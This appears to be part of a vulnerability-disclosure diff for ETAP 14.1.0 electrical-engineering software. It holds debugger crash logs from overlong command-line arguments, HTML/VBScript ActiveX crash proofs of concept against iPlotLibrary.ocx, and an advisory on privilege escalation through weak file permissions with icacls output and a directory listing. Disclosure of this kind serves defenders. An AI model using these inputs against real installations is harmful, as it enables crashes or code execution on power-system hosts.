cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
ra!CFileMap::operator=+0x786:
00408376 66898c50ae040000 mov word ptr [eax+edx*2+4AEh],cx ds:002b:00190000=6341
0:000> !exchain
0018ff3c: ra!CFileMap::GetLength+7b21 (00410041)
Invalid exception stack at 00410041
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0018f3f4 0040855f 00000001 0018f430 00000000 ra!CFileMap::operator=+0x786
0018f410 00427462 f6504047 00000000 00000001 ra!CFileMap::GetLength+0x3f
0018ff48 00410041 00410041 00410041 00410041 ra!CFileMap::SetFileLength+0x125a2
0018ff4c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff50 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff54 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff58 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff5c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff60 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff64 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff68 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff6c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff70 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff74 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff78 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff7c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff80 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
0018ff84 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
..
0:000> d esi
005c2962 72 00 61 00 2e 00 65 00-78 00 65 00 20 00 20 00 r.a...e.x.e. . .
005c2972 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
005c2982 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
005c2992 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
005c29a2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
005c29b2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
005c29c2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
005c29d2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
===============================
C:\ETAP 1410>SFA.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
STATUS_STACK_BUFFER_OVERRUN encountered
(39e0.35b4): WOW64 breakpoint - code 4000001f (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\syswow64\kernel32.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for SFA.exe -
kernel32!GetProfileStringW+0x12cc9:
75150265 cc int 3
===============================
C:\ETAP 1410>so3ph.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
STATUS_STACK_BUFFER_OVERRUN encountered
(380c.3cc4): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\system32\kernel32.dll -
*** WARNING: Unable to verify checksum for SO3Ph.exe
*** ERROR: Symbol file could not be found. Defaulted to export symbols for SO3Ph.exe -
kernel32!UnhandledExceptionFilter+0x71:
00000000`76fcb8c1 cc int 3
0:000> r
rax=0000000000000000 rbx=0000000000000000 rcx=000063dde1df0000
rdx=000000000000fffd rsi=0000000000000001 rdi=0000000000000002
rip=0000000076fcb8c1 rsp=00000000000fe780 rbp=ffffffffffffffff
r8=0000000000000000 r9=0000000000000000 r10=0000000000000000
r11=00000000000fe310 r12=0000000140086150 r13=0000000000000000
r14=000000000012eb00 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
kernel32!UnhandledExceptionFilter+0x71:
00000000`76fcb8c1 cc int 3
===============================
C:\ETAP 1410>TDULF.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(36bc.36b8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\system32\kernel32.dll -
*** WARNING: Unable to verify checksum for C:\ETAP 1410\LF3PHDLL.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\ETAP 1410\LF3PHDLL.dll -
kernel32!lstrcpyW+0xa:
00000000`76f7e41a 668911 mov word ptr [rcx],dx ds:00000000`00130000=6341
0:000> r
rax=000000000012e9d0 rbx=0000000000000001 rcx=0000000000130000
rdx=0000000000000041 rsi=0000000000000000 rdi=000000000012bcf0
rip=0000000076f7e41a rsp=000000000012bc98 rbp=0000000000000000
r8=000000000012fc18 r9=0000000000000000 r10=0000000000000000
r11=0000000000000202 r12=0000000000000000 r13=0000000000000000
r14=000000000000000a r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
kernel32!lstrcpyW+0xa:
00000000`76f7e41a 668911 mov word ptr [rcx],dx ds:00000000`00130000=6341
0:000> d rax
00000000`0012e9d0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0012e9e0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0012e9f0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0012ea00 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0012ea10 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0012ea20 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0012ea30 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00000000`0012ea40 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
...
0:000> r
rax=0000000000000000 rbx=0000000000000001 rcx=ffffffffffffffff
rdx=00410041004123a1 rsi=0000000000000000 rdi=00410041004123a1
rip=000007fefd0a17c7 rsp=000000000012b9a8 rbp=0000000000000000
r8=ffffffffffffffff r9=000000000012ef68 r10=0000000000000000
r11=0000000000000202 r12=0000000000000000 r13=0000000000000000
r14=000000000000000a r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286
KERNELBASE!lstrlenW+0x17:
000007fe`fd0a17c7 66f2af repne scas word ptr [rdi]
===============================
COM/ActiveX PoCs:
-----------------
<html>
<object classid='clsid:E19FDFB8-B4F6-4065-BCCF-D37F3E7E4224' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\Common Files\ETAP\iPlotLibrary.ocx"
prototype = "Property Let Name As String"
memberName = "Name"
progid = "iPlotLibrary.iPlotDataCursorX"
argCount = 1
arg1=String(1000, "A")
target.Name = arg1
</script>
</html>
(2750.243c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Common Files\ETAP\iPlotLibrary.ocx -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\syswow64\OLEAUT32.dll -
eax=00000000 ebx=00000000 ecx=00000000 edx=02d13084 esi=02d13084 edi=001be684
eip=0301c146 esp=001be608 ebp=001be634 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
iPlotLibrary!DllUnregisterServer+0x104e5a:
0301c146 8b4304 mov eax,dword ptr [ebx+4] ds:002b:00000004=????????
0:000> d edx
02d13084 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d13094 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d130a4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d130b4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d130c4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d130d4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d130e4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
02d130f4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
===============================
<html>
<object classid='clsid:E19FDFB8-B4F6-4065-BCCF-D37F3E7E4224' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\Common Files\ETAP\iPlotLibrary.ocx"
prototype = "Property Let MenuItemCaptionValueY As String"
memberName = "MenuItemCaptionValueY"
progid = "iPlotLibrary.iPlotDataCursorX"
argCount = 1
arg1=String(1044, "A")
target.MenuItemCaptionValueY = arg1
</script>
</html>

481
platforms/windows/local/39845.txt Executable file
View file

@ -0,0 +1,481 @@

Operation Technology ETAP 14.1.0 Local Privilege Escalation
Vendor: Operation Technology, Inc.
Product web page: http://www.etap.com
Affected version: 14.1.0.0
Summary: Enterprise Software Solution for Electrical Power Systems. ETAP
is the most comprehensive electrical engineering software platform for the
design, simulation, operation, and automation of generation, transmission,
distribution, and industrial systems. As a fully integrated model-driven
enterprise solution, ETAP extends from modeling to operation to offer a
Real-Time Power Management System.
Desc: ETAP suffers from an elevation of privileges vulnerability which can
be used by a simple authenticated user that can change the executable file
with a binary of choice. The vulnerability exist due to the improper permissions,
with the 'C' flag (Change) for 'Authenticated Users' group.
Tested on: Microsfot Windows 7 Professional SP1 (EN) x86_64
Microsoft Windows 7 Ultimate SP1 (EN) x86_64
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5323
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5323.php
07.04.2016
--
C:\>icacls "ETAP 1410"
ETAP 1410 BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
C:\ETAP 1410>icacls etaps64.exe
etaps64.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
Successfully processed 1 files; Failed processing 0 files
Affected binaries:
------------------
C:\ETAP 1410>dir
Volume in drive C is Windows
Volume Serial Number is 56F3-8688
Directory of C:\ETAP 1410
07/04/2016 11:42 <DIR> .
07/04/2016 11:42 <DIR> ..
01/02/2016 11:14 766 16COLOR.CUR
19/01/2016 02:36 238,592 acsdvd.exe
19/01/2016 02:34 81,920 bifact.dll
19/01/2016 02:36 7,980,032 ca.exe
26/02/2016 16:56 1,220,608 cddll64.dll
19/01/2016 01:48 14,848 ComtradeReader.dll
17/11/2015 17:54 66,982 configdescriptions.xml
01/02/2016 11:14 1,620 ContourSetting.ini
07/04/2016 11:41 <DIR> Convert
19/01/2016 02:35 212,992 csdvd.exe
01/02/2016 11:14 27,136 ctl3d32.dll
19/01/2016 02:28 112,128 ctrlpb.exe
27/06/2013 15:17 7,582 Currency.xml
05/03/2009 12:44 65,536 dao.dll
07/04/2016 11:41 <DIR> Datablocks
26/02/2016 16:35 13,256,192 DATADB.dll
26/02/2016 16:51 19,252,736 datadb64.dll
10/08/2015 13:00 2,011,136 DBCompareInstr.mdb
10/08/2015 13:01 151,552 dbcompareinstr.sdf
08/10/2010 13:20 503,808 DBCompareOutput.mdb
05/11/2014 14:45 86,016 DBCompareOutput.sdf
08/10/2010 13:20 503,808 DBCompareSummary.mdb
05/11/2014 14:45 28,672 DBCompareSummary.sdf
19/01/2016 02:31 53,248 DBExtractConsoleApp.exe
19/01/2016 02:35 896,000 dccalc.exe
26/02/2016 16:54 352,256 dcspdt64.dll
26/02/2016 16:55 348,160 dcspst64.dll
01/02/2016 11:14 229,376 defaultA.mdb
01/02/2016 11:14 20,971,520 defaulte.mdb
01/02/2016 11:14 17,657,856 defaultm.mdb
01/02/2016 11:14 143,360 dunzip32.dll
01/02/2016 11:14 176,128 dzip32.dll
01/02/2016 11:14 3,262 e-dpp2.ico
01/02/2016 11:14 260,942 Electronic License Grant Terms.pdf
01/02/2016 11:14 315,392 enable40.dll
09/02/2016 17:38 137,728 enginemsgs.dll
19/01/2016 02:34 147,456 enginemsgs64.dll
19/01/2016 02:31 253,952 et2waydataxexcel.exe
19/01/2016 02:31 135,168 etaccess.exe
26/02/2016 16:52 3,872,768 ETAnalyzers64.dll
01/02/2016 11:14 76,999 etap.ico
25/03/2001 10:56 246,434 etap2csv.exe
19/01/2016 02:31 54,784 etapcim.dll
19/01/2016 02:31 1,174,528 EtapDevices.DLL
19/01/2016 02:31 67,072 EtapGISDevices.dll
19/01/2016 02:31 14,336 ETAPMongoDB.dll
26/02/2016 16:24 1,325,568 Etapmsgs.dll
26/02/2016 16:38 1,335,296 etapmsgs64.dll
05/02/2016 17:04 49,012,284 etaps.chm
07/04/2016 11:45 660 ETAPS.INI
09/12/2003 12:13 88 etaps.pek
26/02/2016 17:23 86,749,184 etaps64.exe
22/06/2011 17:40 6,130 ETAPS64.exe.config
26/02/2016 16:29 23,688,704 etapsdb.dll
26/02/2016 16:45 26,805,248 etapsdb64.dll
19/01/2016 02:31 125,440 EtapSmartPlant.exe
26/06/2015 12:51 24,571,904 etapsqlenglishmodel.bak
26/06/2015 12:52 24,436,736 etapsqlmetricmodel.bak
19/01/2016 02:31 52,736 ETAP_CIM.EXE
01/02/2016 11:14 6,184 etap_dy_.ttf
19/01/2016 02:31 94,208 etap_edpp.exe
19/01/2016 02:31 20,480 ETAP_GlobalUtilities.dll
19/01/2016 02:31 32,768 ETAP_Graphics.dll
24/06/2015 08:40 9,977,953 etap_overview.pdf
26/02/2016 16:27 44,032 EtArcFlash.dll
26/02/2016 16:44 51,712 EtArcFlash64.dll
19/01/2016 02:31 192,512 etarcgis.exe
19/01/2016 02:31 192,512 etarcgis92.exe
19/01/2016 02:31 192,512 etarcgis93.exe
19/01/2016 02:31 427,520 ETArcGIS_TD.exe
19/01/2016 02:31 428,544 ETArcGIS_TD10.exe
26/02/2016 16:54 417,792 etbatt64.dll
26/02/2016 16:52 614,912 ETBranch64.dll
26/02/2016 16:26 1,353,728 etcabp.exe
26/02/2016 16:53 4,139,008 etcb64.dll
26/02/2016 16:54 1,220,096 etcharg64.dll
19/01/2016 02:28 307,712 ETConfig.EXE
14/09/2015 08:44 287 ETConfig.exe.config
19/01/2016 02:34 68,096 etcp.exe
19/01/2016 02:31 225,280 etdatamapper.dll
19/01/2016 02:31 172,032 etdataxexcel.exe
26/02/2016 16:54 3,728,384 etdc64.dll
26/02/2016 16:54 433,152 etdcbus64.dll
26/02/2016 16:54 768,512 etdccb64.dll
26/02/2016 16:54 970,752 etdced64.dll
26/02/2016 16:54 406,528 etdcfuse64.dll
26/02/2016 16:54 334,336 etdcimp64.dll
26/02/2016 16:54 367,104 etdcknvt64.dll
26/02/2016 16:54 448,512 etdclmp64.dll
26/02/2016 16:55 1,019,904 etdcmach64.dll
26/02/2016 16:54 422,912 etdcstl64.dll
19/01/2016 02:31 1,228,800 etdevices.dll
19/01/2016 02:40 150,528 ETDistanceRelay64.dll
19/01/2016 02:31 135,168 ETDXF.exe
26/02/2016 16:38 633,344 ETEAView.exe
01/02/2016 11:14 3,771 ETEAView.exe.config
19/01/2016 02:31 651,776 ETEZPowerImport.dll
19/01/2016 02:31 8,192 ETFilter.exe
19/01/2016 02:31 102,400 etglu.dll
19/01/2016 02:31 89,088 etglu64.dll
19/01/2016 02:34 168,448 etgrd.exe
26/02/2016 16:56 704,000 ethf64.dll
26/02/2016 16:26 285,184 ETInterchange.exe
01/02/2016 11:14 3,688 ETInterchange.exe.config
26/02/2016 16:55 1,471,488 etinvert64.dll
26/02/2016 16:52 231,936 etlayout64.dll
26/02/2016 16:44 187,392 etlncalc64.dll
26/02/2016 16:56 9,623,552 etload64.dll
19/01/2016 02:31 414,720 ETMergeSync.exe
19/01/2016 02:28 1,081,344 EtMongoUnmanaged.DLL
26/02/2016 16:52 292,352 etmtrupd64.dll
19/01/2016 02:31 51,712 ETMultispeak.exe
19/01/2016 02:31 73,728 ETPanelRep.exe
14/09/2015 08:44 3,262 etpanelrep.ico
26/02/2016 16:52 918,016 etpe64.dll
26/02/2016 16:45 107,008 ETPlugIn64.dll
26/02/2016 16:25 42,496 ETPMStatus.EXE
01/02/2016 11:14 626 ETPMStatus.exe.config
26/02/2016 16:52 776,192 etprofile64.dll
19/01/2016 02:28 94,208 etpsmsexcel.exe
01/02/2016 11:14 2,032 EtPSMSExcel.exe.config
19/01/2016 02:31 126,976 etrawdata.exe
26/02/2016 16:52 389,632 etreac64.dll
26/02/2016 16:27 4,935,680 etrep.dll
26/02/2016 16:43 6,328,320 etrep64.dll
19/01/2016 02:31 32,768 ETRepAnalyzer.exe
19/01/2016 02:32 496,128 ETSkmParser.dll
26/02/2016 16:36 5,586,432 EtStudyCase.dll
26/02/2016 16:53 7,607,296 EtStudyCase64.dll
26/02/2016 16:53 2,739,200 ETTrack64.dll
26/02/2016 16:26 1,235,968 ettrend.exe
01/02/2016 11:14 4,348 EtTrend.exe.config
26/02/2016 16:25 20,480 ettrenddata.dll
26/02/2016 16:55 1,253,888 etups64.dll
26/02/2016 16:55 1,185,792 etvfd64.dll
19/01/2016 02:31 90,112 ET_CATIA.exe
19/01/2016 02:31 45,056 et_ieee.exe
07/04/2016 11:44 <DIR> Example-ANSI
07/04/2016 11:41 <DIR> Example-IEC
07/04/2016 11:41 <DIR> Example-New
07/04/2016 11:41 <DIR> ExcelTemplates
01/02/2016 11:14 433,230 filter.xml
01/02/2016 11:14 566 filterall.xml
03/04/2015 12:50 197,074 FilterDXF.xml
08/10/2010 13:20 99,171 FilterOpenExcel.xml
07/04/2016 11:41 <DIR> Filters
01/02/2016 11:14 33,363 FilterSync.xml
19/01/2016 02:34 102,912 fludbl.dll
07/04/2016 11:42 <DIR> Formats1400
07/04/2016 11:42 <DIR> Formats1410
19/01/2016 02:34 9,728 gasolve.dll
04/05/2004 10:53 1,645,320 gdiplus.dll
26/02/2016 16:25 115,712 grddata.dll
26/02/2016 16:25 245,248 grdrep.dll
19/01/2016 02:34 9,050,112 harmonic.exe
04/11/2004 08:54 471,040 HHActiveX.dll
26/02/2016 16:25 443,904 ILSEngine.dll
26/02/2016 16:38 560,128 ilsengine64.dll
26/02/2016 16:25 81,920 ilsutils.dll
26/02/2016 16:38 77,824 ILSUtils64.dll
01/02/2016 11:14 12,170 ILS_Report_Logo.jpg
01/02/2016 11:14 26,383 ils_snapshot_stylesheet.xsl
01/02/2016 11:14 45,056 ImageComboBox.dll
01/02/2016 11:14 148,488 Infragistics.Shared.v2.dll
01/02/2016 11:14 147,456 Infragistics.Shared.v3.dll
01/02/2016 11:14 1,074,208 Infragistics.Win.UltraWinGrid.v2.dll
01/02/2016 11:14 1,241,088 Infragistics.Win.UltraWinGrid.v3.dll
01/02/2016 11:14 914,456 Infragistics.Win.v2.dll
01/02/2016 11:14 1,236,992 Infragistics.Win.v3.dll
05/03/2009 12:44 65,536 Interop.DAO.dll
01/02/2016 11:14 1,089,536 Interop.Excel.dll
01/02/2016 11:14 217,088 interop.Microsoft.Office.Core.dll
03/08/2004 23:56 69,632 interop.msxml.dll
05/03/2009 12:44 11,776 interop.stdtype.dll
24/01/2011 04:54 57,344 Interop.VBIDE.dll
19/01/2016 02:36 1,227,264 LA3PH.exe
19/01/2016 02:37 4,359,680 LF3PH.exe
19/01/2016 02:36 4,397,568 LF3PHDLL.dll
19/01/2016 02:35 6,849,536 lffd.exe
19/01/2016 02:36 6,247,936 lfgs.exe
19/01/2016 02:35 6,390,272 lfle.exe
19/01/2016 02:37 7,419,904 lfnr.exe
07/04/2016 11:41 <DIR> lib
26/02/2016 16:36 1,601,536 libacc.dll
26/02/2016 16:52 2,033,152 libacc64.dll
26/02/2016 16:34 29,691,392 libsdll.dll
26/02/2016 16:50 35,940,864 libsdll64.dll
19/01/2016 01:49 102,400 lineq.dll
09/02/2016 17:53 122,368 LinEq64.dll
26/02/2016 16:24 1,609,216 locetaps.dll
26/02/2016 16:38 1,701,888 locetaps64.dll
26/02/2016 16:24 133,632 locetcom.dll
26/02/2016 16:38 143,872 locetcom64.dll
01/02/2016 11:14 327,556 Logo.png
26/02/2016 16:25 105,984 MDBCompare.exe
01/02/2016 11:14 149 MDBCompare.exe.config
26/02/2016 16:24 20,480 MDBCompareHelper.dll
07/12/1999 04:00 995,383 mfc42.dll
26/02/2016 11:48 7,208,960 mfclog.dll
26/02/2016 12:01 2,949,120 mfclogb.dll
26/02/2016 11:57 4,390,912 mfcloge.dll
16/02/2016 15:41 8,716,288 mfclogl.dll
26/02/2016 11:48 29,425,664 mfcmdb.dll
26/02/2016 12:01 26,279,936 mfcmdbb.dll
26/02/2016 11:57 28,377,088 mfcmdbe.dll
16/02/2016 15:41 29,425,664 mfcmdbl.dll
05/10/2013 01:38 23,720 MFCMIFC80.DLL
26/02/2016 11:48 10,240 mfcoti.dll
26/02/2016 12:01 10,240 mfcotib.dll
26/02/2016 11:57 10,240 mfcotie.dll
16/02/2016 15:41 10,240 mfcotil.dll
26/09/2013 17:12 331,776 MFCPB.DLL
26/02/2016 11:42 29,853,696 mfcpso.dll
26/08/2015 15:54 1,536 mfcpsob.dll
01/10/2015 08:36 22,067,712 mfcpsoe.dll
26/08/2015 16:40 22,182,912 mfcpsol.dll
01/02/2016 11:14 1,100,392 Microsoft.Office.Interop.Excel.dll
01/02/2016 11:14 781,104 Microsoft.Office.Interop.Word.dll
01/02/2016 11:14 161,192 Microsoft.Practices.EnterpriseLibrary.Common.dl
01/02/2016 11:14 91,560 Microsoft.Practices.EnterpriseLibrary.Data.dll
01/02/2016 11:14 42,408 Microsoft.Practices.EnterpriseLibrary.Logging.D
01/02/2016 11:14 218,536 Microsoft.Practices.EnterpriseLibrary.Logging.d
01/02/2016 11:14 64,352 Microsoft.Practices.ObjectBuilder.dll
01/02/2016 11:14 64,088 Microsoft.Vbe.Interop.dll
01/02/2016 11:14 379,392 MongoDB.Bson.dll
01/02/2016 11:14 559,104 MongoDB.Driver.dll
19/01/2016 02:37 7,927,808 ms.exe
18/08/2001 04:00 1,388,544 msvbvm60.dll
29/08/2000 00:00 401,462 Msvcp60.dll
04/05/2001 11:05 290,869 MSVCRT.DLL
07/12/1999 04:00 253,952 msvcrt20.dll
07/12/1999 04:00 65,024 msvcrt40.dll
19/01/2016 02:36 6,827,008 OCP.exe
01/02/2016 11:14 223,800 Office.dll
01/02/2016 11:14 2,429 olhtypicalcurves.xml
01/02/2016 11:14 6,335 OnlineToolbar.xaml
01/02/2016 11:14 96,256 Opc.Ua.Client.dll
19/01/2016 02:28 167,936 Opc.Ua.ClientControls.dll
01/02/2016 11:14 102,400 Opc.Ua.Configuration.dll
01/02/2016 11:14 91,564 Opc.Ua.Configuration.xml
01/02/2016 11:14 2,970,624 Opc.Ua.Core.dll
01/02/2016 11:14 5,606,536 Opc.Ua.Core.xml
19/01/2016 02:29 112,128 OPCEPICS.exe
19/01/2016 02:36 6,549,504 opf.exe
07/04/2016 11:41 <DIR> Other
19/01/2016 02:28 336,896 Oti.UAToolkit.dll
26/02/2016 16:38 108,544 otiAGCView.dll
26/02/2016 16:25 132,096 otibin.dll
26/02/2016 16:24 106,496 oticommon.dll
26/02/2016 16:38 102,400 oticommon64.dll
26/02/2016 16:38 77,824 oticonfig.dll
26/02/2016 16:38 9,728 oticonfig.xmlserializers.dll
26/02/2016 16:38 167,936 OTIContingency.dll
24/11/2015 18:54 121,344 OtiContourConfig.exe
26/02/2016 16:28 263,680 OtiDistanceRelay.dll
26/02/2016 16:44 263,168 OtiDistanceRelay64.dll
26/02/2016 16:55 1,660,928 OtiDistribDataManager64.dll
26/02/2016 16:44 84,992 OTIDistribution.dll
26/02/2016 16:26 124,928 OTIEA.DLL
26/02/2016 16:38 8,704 OtiEmfToXaml.exe
26/02/2016 16:38 17,920 OtiExcelReport.dll
26/02/2016 17:22 4,165,632 otigraph.dll
26/02/2016 16:38 161,280 otigraph.xmlserializers.dll
26/02/2016 16:28 634,368 OtiGridView.dll
26/02/2016 16:43 638,976 OtiGridView64.dll
26/02/2016 16:25 613,888 OtiInterchange.dll
26/02/2016 16:25 36,864 OtiInterchange.XMLSerializers.DLL
26/02/2016 16:38 613,376 OtiInterchange64.dll
19/01/2016 02:31 183,296 OTIKmlToGis.exe
26/02/2016 16:38 239,104 otilayermanager.dll
26/02/2016 16:38 205,824 OtiLibrary.dll
26/02/2016 16:26 949,760 OtiManage.dll
26/02/2016 16:39 1,397,248 otimanage64.dll
26/02/2016 16:38 72,704 OtiManagedDlg64.dll
26/02/2016 16:25 25,600 otimdbtosql.exe
26/02/2016 16:25 398,336 otimf32.exe
26/02/2016 16:25 12,288 OtiMongoConvert.exe
26/02/2016 16:38 133,632 OtiMongoManaged.dll
26/02/2016 16:25 29,696 OTIOpCon.DLL
26/02/2016 16:38 29,184 OtiOpCon64.dll
19/01/2016 02:28 12,800 OtiPMConfiguration.dll
26/02/2016 16:38 59,904 OtiRemotecode64.dll
26/02/2016 16:38 60,928 OtiRemotecodeinterfaces64.dll
26/02/2016 16:52 538,112 OtiRTDisplay64.dll
26/02/2016 16:38 9,216 OtiRTDisplayInterface.dll
26/02/2016 16:38 86,528 OtiRtWpfControls.dll
26/02/2016 16:38 24,576 OtiRtWpfControlsTelerik.dll
26/02/2016 16:38 574,976 OTIRuleManager.dll
26/02/2016 16:38 24,576 OTIRuleManager.XmlSerializers.dll
26/02/2016 17:22 487,424 otiscenario.dll
26/02/2016 16:38 16,384 OTIScenario.XmlSerializers.dll
26/02/2016 16:25 209,920 OtiServerTracker.dll
26/02/2016 16:38 238,592 OtiServerTracker64.dll
26/02/2016 16:38 5,632 OtiSQLCERead.dll
26/02/2016 16:28 96,768 OtiSQLCeViewer.EXE
19/01/2016 02:28 12,800 OtiSqlUtils.dll
26/02/2016 16:25 229,888 OtiSymbolCreator.exe
26/02/2016 16:24 8,704 OtiSymbolData.dll
26/02/2016 16:25 428,032 OtiSymbolSerializer.dll
26/02/2016 16:38 1,163,264 otitheme.dll
26/02/2016 16:38 210,432 otitheme.xmlserializers.dll
26/02/2016 16:38 287,744 OtiTrack.dll
19/01/2016 02:02 1,043,505 OtiTranslate.xml
26/02/2016 16:36 125,952 pdconfig.exe
